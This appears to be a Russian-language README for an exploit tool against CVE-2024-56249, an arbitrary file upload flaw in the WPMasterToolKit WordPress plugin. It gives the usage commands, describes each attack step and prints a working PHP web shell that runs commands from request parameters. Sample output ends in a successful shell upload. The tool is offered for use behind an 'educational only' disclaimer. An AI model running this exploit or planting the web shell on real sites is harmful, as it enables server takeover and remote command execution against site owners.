
WordPress WPMasterToolKit плагин <= 1.13.1 - Уязвимость произвольной загрузки файлов
Этот скрипт эксплуатирует уязвимость произвольной загрузки файлов в плагине WPMasterToolKit для WordPress, позволяя злоумышленнику загрузить веб-шелл на сервер. Уязвимость существует в версиях плагина <= 1.13.1.
| Идентификатор CVE: | CVE-2024-56249 | | Опубликован: | 2025-01-02 | | Обновлён: | 2025-01-02 | | Описание: | Уязвимость неограниченной загрузки файлов опасного типа в Webdeclic WPMasterToolKit позволяет загружать веб-шелл на веб-сервер. | | CWE: | CWE-434: Неограниченная загрузка файлов опасного типа | | Оценка CVSS: | 9.1 (Критическая) | | Вектор CVSS: | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
Для эксплуатации этой уязвимости используйте следующую команду:
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url: Целевой URL WordPress (например, http://192.168.100.74:888/wordpress)-un / --username: Имя администратора WordPress-p / --password: Пароль администратора WordPress-fp / --filepath: Путь для загрузки файла (по умолчанию: wp-content/uploads/2025/03)-fn / --filename: Имя файла для загрузки (по умолчанию: shell.php)Скрипт начинает с проверки целевого URL, чтобы убедиться, что он уязвим к CVE-2024-56249, путем проверки версии плагина WPMasterToolKit.
Затем он пытается войти в панель администратора WordPress, используя предоставленные учетные данные.
После успешного входа скрипт извлекает необходимые токены безопасности (nonce и token), необходимые для загрузки файла.
Он загружает указанный файл (например, веб-шелл) на целевой сервер, используя извлеченные токены.
Наконец, скрипт проверяет, успешно ли загружен файл, проверяя его доступность через целевой URL.
Убедитесь, что файл шелла (например, shell.php) находится в том же каталоге, что и скрипт, перед его запуском. Это необходимо, чтобы скрипт успешно нашел и загрузил файл.
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Эксплойт Master Toolkit CVE-2024-56249 #от Nxploit | Khaled Alenazi
опции:
-h, --help показать это справочное сообщение и выйти
-u, --url URL Целевой URL WordPress (например, http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
Имя администратора WordPress
-p, --password PASSWORD
Пароль администратора WordPress
-fp, --filepath FILEPATH
Путь для загрузки файла (по умолчанию: wp-content/uploads/2025/03)
-fn, --filename FILENAME
Имя файла для загрузки (по умолчанию: shell.php)
Этот инструмент предназначен только для образовательных целей. Используйте его на свой страх и риск. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Эксплойт-скрипт от Nxploit | Khaled Alenazi